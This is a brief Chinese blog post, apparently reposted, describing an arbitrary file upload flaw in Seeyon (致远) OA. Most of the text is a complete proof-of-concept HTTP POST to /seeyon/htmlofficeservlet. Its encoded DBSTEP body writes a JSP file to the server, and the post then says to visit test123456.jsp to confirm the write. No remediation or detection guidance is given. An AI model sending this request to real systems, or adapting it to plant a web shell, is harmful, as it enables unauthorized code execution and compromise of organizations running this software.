seeyou 致远OA 任意文件上传

2020-12-25 20:27

阅读:632

标签:option   vax   gzip   test   webp   max-age   you   secure   cin   

访问:http://xxxx/seeyon/htmlofficeservlet,看到
技术图片
POC:

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=531FF04E580BC32CDCE288A8A9E33548;
Connection: close
Content-Length: 493

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
Hello World!");%>6e4f045d4b8506bf492ada7e3390d7ce

技术图片

访问:http://xxx/seeyon/test123456.jsp
技术图片

seeyou 致远OA 任意文件上传

标签:option   vax   gzip   test   webp   max-age   you   secure   cin   

原文地址:https://www.cnblogs.com/chy4412312/p/14163004.html


评论


亲,登录后才可以留言!